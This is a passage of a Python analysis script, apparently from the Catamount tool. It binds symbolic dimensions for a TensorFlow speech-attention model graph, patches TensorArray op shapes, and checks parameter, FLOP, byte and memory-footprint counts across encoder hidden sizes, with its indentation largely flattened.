base_dec_hidden_dim = 571
base_enc_hidden_dim = 1051
base_enc_input_dim = 1091 # Input + recurrent state
enc_input_dim_symbol = audio_features_symbol + enc_hidden_dim_symbol
base_dec_attn_rec = 2133
dec_attn_rec_symbol = 2 * enc_hidden_dim_symbol + output_vocab_symbol
base_attn_cell_inputs = 2611
attn_cell_inputs_symbol = 2 * enc_hidden_dim_symbol + attn_hidden_dim_symbol
base_attn_cell_in_dim = 2642
attn_cell_in_dim_symbol = 2 * enc_hidden_dim_symbol + output_vocab_symbol + \
attn_hidden_dim_symbol
base_dec_attn_dim = 3182
dec_attn_dim_symbol = attn_hidden_dim_symbol + 2 * enc_hidden_dim_symbol + \
dec_hidden_dim_symbol
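    # Note: the base_* constants above agree with the symbolic relations, e.g.
    #   base_enc_input_dim    = base_audio_features + base_enc_hidden_dim                     -> 40 + 1051 = 1091
    #   base_dec_attn_rec     = 2*base_enc_hidden_dim + base_output_vocab                     -> 2*1051 + 31 = 2133
    #   base_attn_cell_inputs = 2*base_enc_hidden_dim + base_attn_hidden_dim                  -> 2*1051 + 509 = 2611
    #   base_attn_cell_in_dim = 2*base_enc_hidden_dim + base_output_vocab + base_attn_hidden_dim -> 2642
    #   base_dec_attn_dim     = base_attn_hidden_dim + 2*base_enc_hidden_dim + base_dec_hidden_dim -> 3182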
bind_dict = { # Placeholders
'attn_model/input_seq': [encoder_steps_symbol, subbatch_size_symbol, audio_features_symbol],
'attn_model/input_len': [subbatch_size_symbol],
'attn_model/output_seq': [decoder_steps_symbol, subbatch_size_symbol],
'attn_model/output_mask': [decoder_steps_symbol, subbatch_size_symbol],
# Variables
'InputNormalizer/means': [audio_features_symbol],
'InputNormalizer/std': [audio_features_symbol],
'attn_model/AffineAttentionStateNN/W': [2 * enc_hidden_dim_symbol, attn_dim_symbol],
'attn_model/AffineAttentionStateNN/b': [attn_dim_symbol],
'attn_model/AffineOutputProjection/W': [dec_hidden_dim_symbol, output_vocab_symbol],
'attn_model/AffineOutputProjection/b': [output_vocab_symbol],
'attn_model/Decoder/attn_model/attention_cell/biases': [4 * attn_hidden_dim_symbol],
'attn_model/Decoder/attn_model/attention_cell/weights': [attn_hidden_dim_symbol + 2 * enc_hidden_dim_symbol + output_vocab_symbol, 4 * attn_hidden_dim_symbol],
'attn_model/Decoder/attn_model/decoder_cell/biases': [4 * dec_hidden_dim_symbol],
'attn_model/Decoder/attn_model/decoder_cell/weights': [attn_hidden_dim_symbol + dec_hidden_dim_symbol + 2 * enc_hidden_dim_symbol, 4 * dec_hidden_dim_symbol],
'attn_model/HybridAttentionContext/Q': [conv_width_symbol, 1, num_conv_filters_symbol],
'attn_model/HybridAttentionContext/U': [1, num_conv_filters_symbol, attn_dim_symbol],
'attn_model/HybridAttentionContext/W': [2 * attn_hidden_dim_symbol, attn_dim_symbol],
'attn_model/HybridAttentionContext/b': [attn_dim_symbol],
'attn_model/HybridAttentionContext/w': [attn_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/kernel': [audio_features_symbol + enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/kernel': [audio_features_symbol + enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/kernel': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/kernel': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/kernel': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/kernel': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
# Constants
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/MatMul/Enter_grad/b_acc': [dec_hidden_dim_symbol, output_vocab_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/add/Enter_grad/b_acc': [output_vocab_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/MatMul/Enter_grad/b_acc': [2 * attn_hidden_dim_symbol, attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/add_2/Enter_grad/b_acc': [attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/attention_cell/BiasAdd/Enter_grad/b_acc': [4 * attn_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/attention_cell/attention_cell/add/Enter_grad/b_acc': [attn_hidden_dim_symbol + 2 * enc_hidden_dim_symbol + output_vocab_symbol, 4 * attn_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d/ExpandDims_1/Enter_grad/b_acc': [conv_width_symbol, 1, 4],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d_1/ExpandDims_1/Enter_grad/b_acc': [1, 4, attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/decoder_cell/BiasAdd/Enter_grad/b_acc': [4 * dec_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/decoder_cell/decoder_cell/add/Enter_grad/b_acc': [attn_hidden_dim_symbol + dec_hidden_dim_symbol + 2 * enc_hidden_dim_symbol, 4 * dec_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/mul/Enter_grad/b_acc': [attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [audio_features_symbol + enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [audio_features_symbol + enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
}
# Update constant values
const_dict = {
'attn_model/AffineAttentionStateNN/Reshape/shape': [-1, 2 * enc_hidden_dim_symbol],
'attn_model/AffineAttentionStateNN/Reshape_1/shape/2': attn_dim_symbol,
'attn_model/AttentionEncoderDecoder/Reshape/shape/1': output_vocab_symbol,
'attn_model/AttentionModel/gradients/attn_model/AffineAttentionStateNN/add_grad/Shape_1': [attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/add_grad/Shape_1': [output_vocab_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/add_2_grad/Shape_1': [attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d/Conv2D_grad/Const': [1, conv_width_symbol, 1, num_conv_filters_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d/ExpandDims_1_grad/Shape': [conv_width_symbol, 1, num_conv_filters_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d_1/Conv2D_grad/Const': [1, 1, num_conv_filters_symbol, attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d_1/ExpandDims_1_grad/Shape': [1, num_conv_filters_symbol, attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/mul_grad/Shape_1': [attn_dim_symbol],
'attn_model/Decoder/CustomLSTMCellZeroState/Const': [2 * attn_hidden_dim_symbol],
'attn_model/Decoder/CustomLSTMCellZeroState/Const_1': [2 * attn_hidden_dim_symbol],
'attn_model/Decoder/CustomLSTMCellZeroState_1/Const': [2 * dec_hidden_dim_symbol],
'attn_model/Decoder/CustomLSTMCellZeroState_1/Const_1': [2 * dec_hidden_dim_symbol],
'attn_model/Decoder/while/attn_model/attention_cell/attention_cell/Shape': [attn_hidden_dim_symbol + 2 * enc_hidden_dim_symbol + output_vocab_symbol, 4 * attn_hidden_dim_symbol],
'attn_model/Decoder/while/attn_model/decoder_cell/decoder_cell/Shape': [attn_hidden_dim_symbol + dec_hidden_dim_symbol + 2 * enc_hidden_dim_symbol, 4 * dec_hidden_dim_symbol],
'attn_model/Decoder/while/attn_model/one_hot/depth': output_vocab_symbol,
'attn_model/Decoder/zeros/shape/1': 2 * enc_hidden_dim_symbol,
'attn_model/Decoder/zeros_2/shape/1': output_vocab_symbol,
'attn_model/Reshape/shape': [1, 1, audio_features_symbol],
'attn_model/Reshape_1/shape': [1, 1, audio_features_symbol],
'attn_model/Reshape_2/shape/2': 2 * enc_hidden_dim_symbol,
'attn_model/StackedEncoder/Layer0/RNNEncoder/Reshape/shape/2': audio_features_symbol,
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/Reshape/shape/2': 2 * enc_hidden_dim_symbol,
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/Reshape/shape/2': 2 * enc_hidden_dim_symbol,
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/Const_4': [enc_hidden_dim_symbol],
}
graph.bindConstantValues(const_dict)
# TODO: Currently, Catamount doesn't automatically handle Tensorflow TensorArrays
# or Stack ops. Here, manually set the dimensions of these ops' tensors.
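    # The loop below walks every op and manually patches the output shapes or
    # values of TensorArrayGather, TensorArraySize, and TensorArrayRead ops,
    # depending on whether the op belongs to encoder layer 0, 2, or 4 (the
    # sequence length halves at each strided layer) or to the decoder.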
for op in graph._ops_by_name.values():
op_name_suffix = op.name.split('/')[-1]
if 'TensorArrayGather' in op_name_suffix:
assert isinstance(op, UnknownOp)
assert len(op._inputs) == 3
assert len(op._outputs) == 1
if op._outputs[0].shape.rank == 1 or op._outputs[0].shape.rank == 2:
if len(op._outputs[0].consumers) > 0:
print('TODO: Unknown TensorArrayGather (rank {}): {}'
.format(op._outputs[0].shape.rank, op.debugString()))
elif op._outputs[0].shape.isUnknown() or op._outputs[0].shape.rank == 3:
if len(op._outputs[0].consumers) > 0:
# If output rank is 3, then appears to be:
# [seq_length, batch_size, enc_hid], where
# seq_length depends on layer
out_shape = None
if 'StackedEncoder/Layer0' in op.name:
out_shape = [encoder_steps_symbol,
subbatch_size_symbol,
enc_hidden_dim_symbol]
elif 'StackedEncoder/Layer2' in op.name:
if 'attn_model/AttentionModel/gradients' in op.name:
# Backprop stores concatenated state
out_shape = [encoder_steps_symbol // 2,
subbatch_size_symbol,
2 * enc_hidden_dim_symbol]
else:
out_shape = [encoder_steps_symbol // 2,
subbatch_size_symbol,
enc_hidden_dim_symbol]
elif 'StackedEncoder/Layer4' in op.name:
if 'attn_model/AttentionModel/gradients' in op.name:
# Backprop stores concatenated state
out_shape = [(encoder_steps_symbol // 2) // 2,
subbatch_size_symbol,
2 * enc_hidden_dim_symbol]
else:
out_shape = [(encoder_steps_symbol // 2) // 2,
subbatch_size_symbol,
enc_hidden_dim_symbol]
elif 'Decoder' in op.name:
# HAXXXX: Manually specify a few
if op.name == 'attn_model/Decoder/TensorArrayStack/TensorArrayGatherV3':
out_shape = [decoder_steps_symbol,
subbatch_size_symbol,
output_vocab_symbol]
else:
out_shape = [decoder_steps_symbol,
subbatch_size_symbol,
dec_hidden_dim_symbol]
else:
print('TODO: Unknown TensorArrayGather {}'
.format(op.debugString()))
if out_shape is not None:
op._outputs[0].mergeShape(out_shape, make_symbolic=True)
else:
print('TODO: Unknown TensorArrayGather {}'
.format(op.debugString()))
elif 'TensorArraySize' in op_name_suffix:
assert isinstance(op, UnknownOp)
assert len(op._inputs) == 2
assert len(op._outputs) == 1
assert op._outputs[0].shape.rank == 0
# NOTES:
# StackedEncoder Layer0: enc_seq
# StackedEncoder Layer2: enc_seq / 2 # Due to stride 2 in time
# StackedEncoder Layer4: enc_seq / 4 # Due to stride 2 in time
# Decoder: dec_seq
if 'StackedEncoder/Layer0' in op.name:
op._outputs[0].setValue(encoder_steps_symbol)
elif 'StackedEncoder/Layer2' in op.name:
op._outputs[0].setValue(encoder_steps_symbol // 2)
elif 'StackedEncoder/Layer4' in op.name:
op._outputs[0].setValue((encoder_steps_symbol // 2) // 2)
elif 'Decoder' in op.name:
op._outputs[0].setValue(decoder_steps_symbol)
else:
print('WARN: Unknown TensorArraySizeV3: {}'
.format(op.debugString()))
elif 'TensorArrayRead' in op_name_suffix:
assert isinstance(op, UnknownOp)
assert len(op._inputs) == 3
assert len(op._outputs) == 1
assert op._outputs[0].shape.isUnknown() or \
op._outputs[0].shape.rank == 2, \
'{}'.format(op.name)
if op._outputs[0].shape.isUnknown():
if len(op._outputs[0].consumers) > 0:
out_shape = None
if 'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer' in op.name and \
('/RNNEncoder/bidirectional_rnn/fw/fw/while/TensorArrayWrite/TensorArrayWriteV3_grad/TensorArrayReadV3' in op.name or \
'/RNNEncoder/bidirectional_rnn/bw/bw/while/TensorArrayWrite/TensorArrayWriteV3_grad/TensorArrayReadV3' in op.name):
out_shape = [subbatch_size_symbol,
enc_hidden_dim_symbol]
elif op.name == 'attn_model/AttentionModel/gradients/attn_model/Decoder/TensorArrayWrite/TensorArrayWriteV3_grad/TensorArrayReadV3' or \
op.name == 'attn_model/AttentionModel/gradients/attn_model/Decoder/while/TensorArrayWrite_1/TensorArrayWriteV3_grad/TensorArrayReadV3' or \
op.name == 'attn_model_2/Decoder/while/cond/TensorArrayReadV3' or \
op.name == 'attn_model/Decoder/while/cond/TensorArrayReadV3':
out_shape = [subbatch_size_symbol,
output_vocab_symbol]
else:
print('WARN: Unknown TensorArrayReadV3 out shape: {}'
.format(op.debugString()))
if out_shape is not None:
op._outputs[0].mergeShape(out_shape, make_symbolic=True)
else:
# NOTES: Many are (?, 40 "features"), (?, 1051 "enc_hid"), or (?, 2102 "2*enc_hid")
dim_1_val = op._outputs[0].shape.getDimension(1).value
assert dim_1_val == base_audio_features or \
dim_1_val == base_enc_hidden_dim or \
dim_1_val == 2 * base_enc_hidden_dim, \
'Op: {}\n Dim 1 value: {}'.format(op.debugString(), dim_1_val)
out_shape = None
if dim_1_val == base_audio_features:
out_shape = [subbatch_size_symbol, audio_features_symbol]
elif dim_1_val > 0 and dim_1_val % base_enc_hidden_dim == 0:
mult = dim_1_val // base_enc_hidden_dim
out_shape = [subbatch_size_symbol, mult * enc_hidden_dim_symbol]
else:
print('Unhandled TensorArrayRead: {}'.format(op.debugString()))
if out_shape is not None:
op._outputs[0].mergeShape(out_shape, make_symbolic=True)
# Manually set a couple shapes for max ops that can't yet resolve
# maximums of 1 vs. positive symbols:
max_op = graph._ops_by_name['attn_model/AttentionModel/gradients/attn_model/AttentionEncoderDecoder/Sum_grad/Maximum']
max_op._outputs[0].mergeShape([2])
max_op._outputs[0].setValue([1, subbatch_size_symbol])
max_op = graph._ops_by_name['attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/Sum_grad/Maximum']
max_op._outputs[0].mergeShape([3])
# [floor(floor(encoder_steps/2)/2) subbatch_size 1]
max_op._outputs[0].setValue([(encoder_steps_symbol // 2) // 2,
subbatch_size_symbol, 1])
max_op = graph._ops_by_name['attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/Sum_1_grad/Maximum']
max_op._outputs[0].mergeShape([3])
# [1 subbatch_size 2*enc_hidden_dim]
max_op._outputs[0].setValue([1, subbatch_size_symbol,
2 * enc_hidden_dim_symbol])
print('Binding variables')
graph.bindShapesAndPropagate(bind_dict, warn_if_ill_defined=(not is_pytest_run), make_symbolic=True)
assert graph.isValid()
print('\n\nCleaned Graph:\n{}'.format(graph))
print('\n\nBound values')
# Set base values to be subbed in:
base_encoder_steps = 96
base_decoder_steps = 24
base_attn_dim = 128
base_conv_width = 50
base_attn_hidden_dim = 512
base_dec_hidden_dim = 512
base_enc_hidden_dim = 1024
bind_subs = { audio_features_symbol: base_audio_features,
encoder_steps_symbol: base_encoder_steps,
decoder_steps_symbol: (encoder_steps_symbol // 2) // 2,
subbatch_size_symbol: base_subbatch_size,
attn_dim_symbol: base_attn_dim,
attn_hidden_dim_symbol: enc_hidden_dim_symbol // 2,
dec_hidden_dim_symbol: enc_hidden_dim_symbol // 2,
output_vocab_symbol: base_output_vocab,
conv_width_symbol: base_conv_width,
enc_hidden_dim_symbol: base_enc_hidden_dim,
num_conv_filters_symbol: 4,
graph_iters_symbol: 1,
}
# Add loop iteration counts to bind_subs
bind_str_subs = {
'attn_model/AttentionModel/gradients/b_count_2_block::iters': decoder_steps_symbol,
'attn_model/Decoder/while/LoopCond_block::iters': decoder_steps_symbol,
'attn_model/AttentionModel/gradients/b_count_22_block::iters': encoder_steps_symbol,
'attn_model/AttentionModel/gradients/b_count_26_block::iters': encoder_steps_symbol,
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/while/LoopCond_block::iters': encoder_steps_symbol,
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/while/LoopCond_block::iters': encoder_steps_symbol,
'attn_model/AttentionModel/gradients/b_count_14_block::iters': encoder_steps_symbol // 2,
'attn_model/AttentionModel/gradients/b_count_18_block::iters': encoder_steps_symbol // 2,
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/while/LoopCond_block::iters': encoder_steps_symbol // 2,
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/while/LoopCond_block::iters': encoder_steps_symbol // 2,
'attn_model/AttentionModel/gradients/b_count_6_block::iters': (encoder_steps_symbol // 2) // 2,
'attn_model/AttentionModel/gradients/b_count_10_block::iters': (encoder_steps_symbol // 2) // 2,
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/while/LoopCond_block::iters': (encoder_steps_symbol // 2) // 2,
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/while/LoopCond_block::iters': (encoder_steps_symbol // 2) // 2,
}
for var_name, sub_val in bind_str_subs.items():
var_ref = utils.getIntSymbolFromString(var_name)
assert var_name not in bind_subs.keys()
bind_subs[var_ref] = sub_val
# Calculate model parameter count
parameters = graph.calcModelParameters()
resolved_params = parameters.subs(bind_subs)
try:
resolved_params = int(resolved_params)
except:
print('ERROR: resolved_params should be int, but is {} = {}'.format(
type(resolved_params), resolved_params))
correct_params = 71084729
assert resolved_params == correct_params, \
'Incorrect model params: {}'.format(resolved_params)
print('Parameters: {}\nWith specified dims: {}\n'.format(parameters, resolved_params))
# Calculate algorithmic Flops
alg_flops = graph.calcAlgFlops()
resolved_flops = alg_flops.subs(bind_subs)
try:
resolved_flops = int(resolved_flops)
except:
print('ERROR: resolved_flops should be int, but is {} = {}'.format(
type(resolved_flops), resolved_flops))
correct_flops = 568878183032
assert resolved_flops == correct_flops, \
'Incorrect algorithmic flops: {}'.format(resolved_flops)
print('Algorithmic Flops: {}\nWith specified dims: {}\n'.format(alg_flops, resolved_flops))
    # Calculate algorithmic bytes accessed
alg_bytes = graph.calcAlgBytes()
resolved_bytes = alg_bytes.subs(bind_subs)
try:
resolved_bytes = int(resolved_bytes)
except:
print('ERROR: resolved_bytes should be int, but is {} = {}'.format(
type(resolved_bytes), resolved_bytes))
correct_bytes = 92231419797
assert resolved_bytes == correct_bytes, \
'Incorrect algorithmic bytes: {}'.format(resolved_bytes)
print('Alg bytes accessed: {}\nWith specified dims: {}\n'.format(alg_bytes, resolved_bytes))
    # Calculate algorithmic memory footprint
alg_footprint = graph.calcAlgFootprint()
resolved_footprint = alg_footprint.subs(bind_subs)
try:
resolved_footprint = int(resolved_footprint)
except:
print('ERROR: resolved_footprint should be int, but is {} = {}'.format(
type(resolved_footprint), resolved_footprint))
correct_footprint = 32624988214
assert resolved_footprint == correct_footprint, \
'Incorrect algorithmic footprint: {}'.format(resolved_footprint)
print('Alg mem footprint: {}\nWith specified dims: {}\n'.format(alg_footprint, resolved_footprint))
# Calculate algorithmic IO per step
total_io_footprint = 0
for op in graph.getPlaceholders():
total_io_footprint += op.calcAlgFootprint()
resolved_io_footprint = total_io_footprint.subs(bind_subs)
print('Alg IO footprint: {}\nWith specified dims: {}\n'.format(total_io_footprint, resolved_io_footprint))
    print('VERBOSE ALGORITHMIC FLOPS:')
graph.calcAlgFlops(verbose=True)
print('')
    print('VERBOSE ALGORITHMIC BYTES:')
graph.calcAlgBytes(verbose=True)
print('')
    print('VERBOSE ALGORITHMIC FOOTPRINT:')
graph.calcAlgFootprint(verbose=True)
print('')
# HACKY WAY TO SAVE MODELS FOR NOW!
pickle.dump(graph, open('catamount/frameworks/example_graphs/tensorflow/full_models/speech_attention/graph_speech_attention.p', 'wb'))
if is_pytest_run:
return
print('\n\n======= Algorithmic graph-level analytics: =======')
encoder_dims = [32, 64, 96, 128, 160, 192, 256, 320, 384, 448, 512, 640, 768, 892, 1024, 1152, 1280, 1408, 1548, 1702, 1872, 2059, 2264, 2490, 2739, 3012, 3289]
base_encoder_steps = 335
base_subbatch_size = 32
base_attn_dim = 128
base_conv_width = 50
base_attn_hidden_dim = 512
base_dec_hidden_dim = 512
base_enc_hidden_dim = 1024
bind_subs[audio_features_symbol] = base_audio_features
bind_subs[encoder_steps_symbol] = base_encoder_steps
bind_subs[decoder_steps_symbol] = (encoder_steps_symbol // 2) // 2
bind_subs[subbatch_size_symbol] = base_subbatch_size
bind_subs[attn_dim_symbol] = base_attn_dim
bind_subs[attn_hidden_dim_symbol] = enc_hidden_dim_symbol // 2
bind_subs[dec_hidden_dim_symbol] = enc_hidden_dim_symbol // 2
bind_subs[output_vocab_symbol] = base_output_vocab
bind_subs[conv_width_symbol] = base_conv_width
# bind_subs[enc_hidden_dim_symbol] = base_enc_hidden_dim
bind_subs[num_conv_filters_symbol] = 4
bind_subs[graph_iters_symbol] = 1
bind_subs.pop(enc_hidden_dim_symbol)
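    # enc_hidden_dim_symbol is deliberately left unbound so the sweep below can
    # vary it; attn_hidden_dim and dec_hidden_dim are tied to enc_hidden_dim / 2
    # above, so they rescale along with the encoder width.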
resolved_params = parameters.subs(bind_subs)
print('Symbol associations: {}\n'.format(bind_subs))
print('Algorithmic Flops by hidden dimension, params, and per-batch-sample:')
resolved_flops = alg_flops.subs(bind_subs)
for enc_dim in encoder_dims:
graph_params = resolved_params.subs({enc_hidden_dim_symbol: enc_dim})
graph_flops = resolved_flops.subs({enc_hidden_dim_symbol: enc_dim})
graph_flops_per_sample = float(graph_flops) / \
bind_subs[subbatch_size_symbol]
print('{}\t{}\t{}\t{}'.format(enc_dim, graph_params, graph_flops,
int(graph_flops_per_sample)))
print('\nAlgorithmic bytes accessed by hidden dimension, params:')
resolved_bytes = alg_bytes.subs(bind_subs)
for enc_dim in encoder_dims:
graph_params = resolved_params.subs({enc_hidden_dim_symbol: enc_dim})
graph_bytes = resolved_bytes.subs({enc_hidden_dim_symbol: enc_dim})
print('{}\t{}\t{}'.format(enc_dim, graph_params, graph_bytes))
print('\nAlgorithmic memory footprint by hidden dimension, params:')
